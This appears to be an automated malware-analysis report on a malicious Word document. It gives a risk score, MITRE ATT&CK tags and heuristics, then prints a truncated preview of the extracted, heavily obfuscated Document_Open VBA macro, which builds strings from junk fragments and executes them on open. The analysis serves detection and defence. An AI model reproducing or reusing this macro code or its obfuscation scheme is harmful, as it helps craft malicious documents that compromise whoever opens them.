MALICIOUS
102
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an OLE document containing a Document_Open VBA macro, which is a common technique for executing malicious code upon opening. The macro code is heavily obfuscated and truncated, making it difficult to determine its exact function, but it is likely designed to download and execute a second-stage payload. The presence of a Document_Open macro and the obfuscated VBA code strongly suggest a malicious intent, likely delivered via spearphishing.
Heuristics 4
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 111,030 bytes but its declared streams total only 36,254 bytes — 74,776 bytes (67%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18395 bytes |
SHA-256: ee8125bab15ab2180d9427ddfab0012516ac00d653f187a4d301ac7033170d8b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "WOKSzAjrcOJvkM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If CWfXmK = Vpcqw Then
Dim OsaZv()
JWaOzH = OCRkm + LdkMXH + BFqCz + XdhBG
tdKOb = iPMvJ + EpOmb + fDRqiE + YOnjwj
End If
If WGIik <> GhBXE Then
Dim otomto()
iGbHIB = jzzsuz + mRJXE + HXJFZ + fLditM
mQwuz = cwVIi + cFiCc + OpWiLw + hfWbC
End If
If szBOIE > 6 Then
Dim ssFvmz()
vlBDW = jDwFi + uufQP
sUzPl = WbNZw + JtaEr
End If
If diGApA > 8 Then
Dim jEJuMb()
mucMjA = hvqJFY + pcpDhV + ilTIOp + RRSNWi
wzrKw = wjQrk + wqbUrf + EIIJE + KIQdX
End If
If qaqfws <= PpvUcY Then
Dim rppzbi()
dNqon = ozjFtv + lXAwV
wqPNnj = jSTajv + RMMAr + AtSJp + jWATpt
End If
If laOACH >= MViFY Then
Dim ijZLAF()
zCXFX = AJfzd + FScrzL + jEoYnE + iwmbI
nQjiCI = rHwjWA + TfGsb
End If
arwXTMXIaOE (rUVqV + cwbjM + PbXIs + OiEEiHMCU + SzLiH + LJuvGwKqwa + EWzvnpsuV + UWdFcLtrZXz + NQhYniRcOH + qMsqXJW + lObvwW)
If BziXh <= FzYSU Then
Dim VSpci()
spLFVs = AwwVa + JZRBUb
End If
End Sub
Attribute VB_Name = "InrzrBVA"
Function rUVqV()
JLiJZvbbppO = "`ja ,S[7[LK,@ [p[b[q" + " [?[F:[;u[ [ [D[Vk[" + " %&5 [i-[P" + "[ [#,[8[ [" + "b[X[^[ [y[C[ [ [!["
If dtvvh < oDNNXN Then
Dim ICwPRi()
bHLFsC = wcMuD + jBEjXL + KFcSUH + QpzUiX
End If
If VhqCfM <> aATUhN Then
Dim wPrFm()
Wftkka = IfsQf + nfWqV + fUibzA + OJqhdY
zWqoGR = EhuID + fZbcZW
End If
If ISXRz <> RwoKko Then
Dim vMQEF()
VbzLfh = jUkQM + SSFIND + ltIEij + KCbPu
End If
If YiKGr >= zrzNXz Then
Dim WwpECB()
zcSscz = pjsUV + stkvB
End If
ZOQmKzmTLz = "ho[ [=[^U[ [d[N" + "[7[ [H[A[_ [7" + "[B[H[ [p[t[*"
wZMrn = "[ [?[e[C[ [$[P[N[" + " [U[<[P[ " + """" + "[" + "QK[ [d[\[+[z4[VB" + "[z[C[)[j[x" + "[E[<[7[e[:[ [ `"
If pRJNC Xor OFPhJf Then
Dim QnOHMI()
TqnGCo = szcRbk + iMwKj + MQzdu + awSfkK
End If
If wziCKN >= VInPh Then
Dim QmbRzf()
jDsJMN = oaRrG + HWfhuz
End If
If rDtjK <> 18 Then
Dim wRwOr()
EQphkD = amjSwL + ohOIHz + kfmvWG + FQwuLu
JmvoSw = aHlzXP + RDpHs
End If
If lDlNw = VWmYkR Then
Dim fvSTp()
wKXBz = rUnMHm + iGXjJ + VMLDUM + FusWl
End If
jbRUrKoFi = "[V[#[-[q[F'K" + "^[R[P[X`[h" + "[FSz[6[I[u[8[" + "j[?d[h[\[:[u[^" + """" + "[-[Z" + "[b[/[Q,o[.["
hvcFASt = "N[x[_`[+[I[8[v[Q[" + "D[L[V[T[pK[A[Q[*o[" + "I[g[E[![b[][r " + "[p6[lj[U'[a[b[7['["
jdzui = "3[q[8[g[P[F[U&[" + "b[*[iA[j[b[:[" + "e[5[h[V[ts"
rUVqV = JLiJZvbbppO + ZOQmKzmTLz + wZMrn + jbRUrKoFi + hvcFASt + jdzui
If IJNMuJ > qOnfo Then
Dim vGVqzz()
vqvJi = uHtXzL + puivz + DijDE + KJaYMD
End If
End Function
Function cwbjM()
RTpzOcYlGTB = "[l6[u[bs[ " + "[$[:k[Z[G[w[F,[l[" + "7[8[+[U[ &[v[U" + "[6[L?[d%K[3[P[E" + "o[+[U[/[![p[N&" + "[ [ S[J[)[+[H"
If iUSHK = baafd Then
Dim jvGXVA()
zvUPj = FXpVjr + DwDsFP + KCzva + CoTPVG
End If
If TmIvMX = IEETf Then
Dim dYRqNW()
vFwmiV = HijID + msUilc + uGTVpP + iXlcAz
hOnWQ = DziYvQ + okEmE
End If
If XCbdK >= ZvZlhD Then
Dim zWaaPM()
njoEB = XaJuP + wDSOW
End If
If XHOFi >= 12 Then
Dim EBlEu()
pqisOR = tzwwY + kpREaz + rkfro + XACJRs
mJMGb = DAGDb + pQzZn + LEUzFK + DbuFqq
End If
If vROEi > PDwqp Then
Dim TIAXZ()
iwlLnq = XiTihU + sSudUq + MoamM + HrBaB
NXXRjd = WGcvV + WtbAN
End If
UlzrjuoWwf = "[*[G[c[$[=[^[ [U" + "[F[P[Xj,[!" + "@[T[6%[>[#`[b[?" + "[H[ [i" + """" + "J[ " + "[f[T[1[5[C]" + "[7[#[a[q[-[\^[n[fo"
wOIaCoHiz = "[l[$['[\[i[7@[;" + "k^[ [J[t[ [+[ " + "[l&[c0[AC@[w+" + "[v[g,[G[ds[/[M[e[T" + "[b[T[3[V[Q[![F[6K[x[" + "h[Z[0[v,[vmo[3"
cwbjM = RTpzOcYlGTB + UlzrjuoWwf + wOIaCoHiz
If lUnLq Or FXijzM Then
Dim MqDWzi()
QtituX = CXiSd + iqamN + PswUp + wzjlG
End If
If omdwOh Or jsDIEK Then
Dim ihIUl()
ucvZZP = wTzYOJ + scJaCI
End If
End Function
Function PbXIs()
VHGvP = "[p[{[q[/,[z[x" + "[bo[y&r[w[u[I[" + "#[a[x[g[M[6[" +
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.